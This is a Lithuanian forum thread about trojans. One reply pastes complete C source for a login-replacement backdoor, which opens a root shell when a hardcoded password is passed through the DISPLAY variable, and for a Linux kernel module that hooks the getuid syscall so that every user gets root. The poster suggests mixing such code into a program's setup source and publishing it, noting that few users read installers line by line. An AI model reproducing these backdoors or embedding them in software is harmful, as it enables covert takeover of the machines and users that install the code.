XP trojanai
-
- profesionalas
- Pranešimai:1481
- Užsiregistravo:2001 12 06 09:51
XP trojanai
-
- Pranešimai:3
- Užsiregistravo:2005 04 08 21:05
- Miestas:Mazeikiai
Skaityk cia http://lwn.net/1998/1119/Trojan.html ir apie *nix sitemas nustosi galvot kaip apie nenulauziamas.
Arba sitas:
Arba root statusas visiem useriam:
Tokius kodus tereik tik i kokios programos setupo sorsa imaisyt ir idet i intika. Retas kuris pries istaliuodamas programa i linux skaito kiekviena eilute, o automatizuotu skriptu nera.
Cia tik pora pavyzdziu, tokiu prirasyta iki siandien gal jau simtai.
Arba sitas:
Kodas: Pasirinkti visus
/*
* PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* Universal login trojan by Tragedy/Dor
* Email: rawpower@iname.com
* IRC: [Dor]@ircnet
*
* Login trojan for pretty much any O/S...
* Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
* OSF1/DGUX4.0,
* Known not to work on:
* SunOS 4.x and 5.4... Seems the only variable passwd to login
* on these versions of SunOS is the $TERM... and its passed via
* commandline option... should be easy to work round in time
*
* #define PASSWORD - Set your password here
* #define _PATH_LOGIN - This is where you moved the original login to
* login to hacked host with...
* from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
*
*/
#include <stdio.h>
#if !defined(PASSWORD)
#define PASSWORD "j4l0n3n"
#endif
#if !defined(_PATH_LOGIN)
# define _PATH_LOGIN "/bin/login"
#endif
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/sh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
Arba root statusas visiem useriam:
Kodas: Pasirinkti visus
/*
* A kernel trojan (basic linux kernel module)
*
* Description: gives all users root
*
* coded by fred_ | blasphemy
*
* Compile: gcc -c -O3 all-root.c
* Load: insmod all-root.o
* Unload: rmmod all-root
*
* email: cornoil@netscape.net
*/
#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <sys/mman.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>
extern void *sys_call_table[];
int (*orig_getuid)();
int give_root()
{
int x;
if (current->uid != 0) {
current->uid = 0;
current->gid = 0;
current->euid = 0;
current->egid = 0;
}
return 0;
}
int init_module(void)
{
orig_getuid = sys_call_table[SYS_getuid];
sys_call_table[SYS_getuid] = give_root;
return 0;
}
void cleanup_module(void)
{
sys_call_table[SYS_getuid] = orig_getuid;
}
Cia tik pora pavyzdziu, tokiu prirasyta iki siandien gal jau simtai.
Dabar prisijungę
Vartotojai naršantys šį forumą: 1 ir 0 svečias(ių)